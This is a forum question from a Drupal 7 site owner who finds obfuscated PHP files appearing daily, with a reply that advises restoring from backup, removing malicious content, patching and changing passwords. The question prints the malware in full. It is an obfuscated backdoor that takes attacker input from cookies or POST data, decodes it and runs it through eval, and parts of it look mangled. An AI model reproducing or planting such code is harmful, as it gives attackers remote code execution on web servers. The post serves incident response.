Drupal 7 Recent log messages
Question
I am facing with an issue. Everyday on my server appers .ico files and .php file with this kind of code:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11 ];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}
Could you please tell me what should I do? I am using rackspace hosting. Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log. How can I stop that?
Thanks in advance!
1 answers
solution1
0 2018-06-04 09:45:34
Hacked. I was recently cleaning hacked site my self and it was nightmare. Best would be to retrieve some recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:
- Clean all the files with malicious content. Go search/replace trough all the files.
- Dump database and do the same thing to dump file - remove malicious content and then import it back.
- Check for user accounts. If there are some suspicious one block/delete them.
- Check for newly created suspicious user groups. Delete them too.
- Make a backup.
- Apply all security updates/patches. Make fresh backup again.
- Change all account passwords (drupal admins, ftp accounts, database accounts).
- Set scheduled backup. Ie use Becakup&Migrate module for that.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.